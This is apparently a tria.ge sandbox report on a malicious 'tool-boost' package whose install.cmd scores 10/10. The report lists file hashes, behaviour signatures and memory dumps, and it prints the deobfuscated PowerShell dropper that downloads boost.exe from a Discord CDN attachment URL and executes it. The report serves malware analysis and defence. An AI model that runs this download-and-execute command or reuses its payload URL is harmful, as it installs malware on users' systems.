Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

tool-boost...st.zip

windows7-x64

1

tool-boost...st.zip

windows10-2004-x64

1

tool-boost...DME.md

windows7-x64

3

tool-boost...DME.md

windows10-2004-x64

3

tool-boost...ing.py

windows7-x64

3

tool-boost...ing.py

windows10-2004-x64

3

tool-boost...g.json

windows7-x64

3

tool-boost...g.json

windows10-2004-x64

3

tool-boost...s.json

windows7-x64

3

tool-boost...s.json

windows10-2004-x64

3

tool-boost...es.txt

windows7-x64

1

tool-boost...es.txt

windows10-2004-x64

1

tool-boost...ll.cmd

windows7-x64

10

tool-boost...ll.cmd

windows10-2004-x64

10

tool-boost...uth.py

windows7-x64

3

tool-boost...uth.py

windows10-2004-x64

3

tool-boost...le.txt

windows7-x64

1

tool-boost...le.txt

windows10-2004-x64

1

tool-boost...rt.bat

windows7-x64

10

tool-boost...rt.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    09/06/2024, 15:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tool-boost-funk-boost/install.cmd

  • Size

    1KB

  • MD5

    855d939ccba31eea9642590da637b185

  • SHA1

    c776222f87406ebaf15b8907808623e4f5624d0c

  • SHA256

    df728f23ff74320e4cf317c33470602f160132aecff1416692b403d3ab17062d

  • SHA512

    9dd853e8f1cba2ebc87ccee3ea391cc2517e842c94d201bb3232e6b16177feebb35daf078d41da5fc3fb2377d7246750dfc61c707cb9d160a4f9ebeba50c3936

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1186759970017005689/1203466731985829998/boost.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\tool-boost-funk-boost\install.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $down=New-Object System.Net.WebClient;$url='https://cdn.discordapp.com/attachments/1186759970017005689/1203466731985829998/boost.exe';$file='boost.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1748

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1748-4-0x000007FEF626E000-0x000007FEF626F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1748-5-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1748-6-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1748-7-0x00000000027F0000-0x00000000027F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1748-9-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1748-8-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1748-10-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1748-11-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1748-12-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

    Filesize

    9.6MB

    Download